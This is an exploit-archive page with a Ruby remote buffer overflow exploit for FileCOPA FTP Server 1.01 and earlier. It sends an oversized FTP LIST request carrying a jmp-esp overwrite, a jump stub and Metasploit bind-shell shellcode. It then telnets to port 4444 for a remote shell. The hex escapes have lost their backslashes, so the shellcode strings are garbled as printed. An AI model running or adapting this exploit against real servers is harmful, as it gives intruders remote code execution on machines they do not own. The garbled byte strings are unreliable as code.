FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit (2)
# Published : 2007-04-06
# Author : Umesh Wanve
# Previous Title : Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
# Next Title : HP Mercury Quality Center Spider90.ocx ProgColor Overflow Exploit

# =============================================================================================
#                    FileCOPA FTP Server <= 1.01 (LIST) Remote Buffer Overflow Exploit(2)
#                                               By Umesh Wanve
# =============================================================================================         
#
# Date : 05-04-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
#   
#  We can write some assembly instruction to jump into shellcode. At the time of EIP overwrite, ECX points to our
#  hole request(LIST evil). So jumping forward into ECX points to our Shellcode. This was written coz i was learning
#  ruby
#
#  P.S. This was written for educational purpose. Use it at your own risk.Author will be not be
#  responsible for any damage.
#
#  Always Thanks to Metasploit and Stroke
#===============================================================================================

require 'net/ftp'

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
shellcode = "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xf7"
shellcode += "x82xf8x80x83xebxfcxe2xf4x0bxe8x13xcdx1fx7bx07x7f"
shellcode += "x08xe2x73xecxd3xa6x73xc5xcbx09x84x85x8fx83x17x0b"
shellcode += "xb8x9ax73xdfxd7x83x13xc9x7cxb6x73x81x19xb3x38x19"
shellcode += "x5bx06x38xf4xf0x43x32x8dxf6x40x13x74xccxd6xdcxa8"
shellcode += "x82x67x73xdfxd3x83x13xe6x7cx8exb3x0bxa8x9exf9x6b"
shellcode += "xf4xaex73x09x9bxa6xe4xe1x34xb3x23xe4x7cxc1xc8x0b"
shellcode += "xb7x8ex73xf0xebx2fx73xc0xffxdcx90x0exb9x8cx14xd0"
shellcode += "x08x54x9exd3x91xeaxcbxb2x9fxf5x8bxb2xa8xd6x07x50"
shellcode += "x9fx49x15x7cxccxd2x07x56xa8x0bx1dxe6x76x6fxf0x82"
shellcode += "xa2xe8xfax7fx27xeax21x89x02x2fxafx7fx21xd1xabxd3"
shellcode += "xa4xd1xbbxd3xb4xd1x07x50x91xeaxe9xdcx91xd1x71x61"
shellcode += "x62xeax5cx9ax87x45xafx7fx21xe8xe8xd1xa2x7dx28xe8"
shellcode += "x53x2fxd6x69xa0x7dx2exd3xa2x7dx28xe8x12xcbx7exc9"
shellcode += "xa0x7dx2exd0xa3xd6xadx7fx27x11x90x67x8ex44x81xd7"
shellcode += "x08x54xadx7fx27xe4x92xe4x91xeax9bxedx7ex67x92xd0"
shellcode += "xaexabx34x09x10xe8xbcx09x15xb3x38x73x5dx7cxbaxad"
shellcode += "x09xc0xd4x13x7axf8xc0x2bx5cx29x90xf2x09x31xeex7f"
shellcode += "x82xc6x07x56xacxd5xaaxd1xa6xd3x92x81xa6xd3xadxd1"
shellcode += "x08x52x90x2dx2ex87x36xd3x08x54x92x7fx08xb5x07x50"
shellcode += "x7cxd5x04x03x33xe6x07x56xa5x7dx28xe8x07x08xfcxdf"
shellcode += "xa4x7dx2ex7fx27x82xf8x80"


host="10.217.100.130"                                              #Target address  

pad ="A" * 160                                                          # Buffer
eip = "x63x37x57x7c"                                           #jmp esp from KERNEL32.DLL on Win2000 SP4 English
nop ="x90" * 12                                                       # Nop Sled
nop1="x90" * 4      

asm ="x33xc0xb0x10xc1xe0x04x03xc8xffxe1"
# 33 c0       xor eax, eax
# b0 10       mov al,  10
# c1 e0 04   shl eax,4
# 03 c8       add ecx,eax
# ff e1        jmp ecx  

buffer ="Ax20" + pad  + eip + nop1 + asm + nop + shellcode +"rn"         # Our Evil Buffer

ftp = Net::FTP.new(host)

puts "++ Connecting to target...n"

ftp.login(user="test", passwd="test")                            # User name and password
ftp.passive = true
sleep(2)

puts "++ Logging in....n"
sleep(2)
puts "++ Building Malicious Request ....n"

begin
   ftp.list(buffer)
rescue Net::FTPError
    $stderr.print "++ Done ...n"
end



puts "++ Connecting to target on port 4444....n"


command= "telnet "+ host +" 4444"

system(command)

ftp.close

# www.Syue.com [2007-04-06]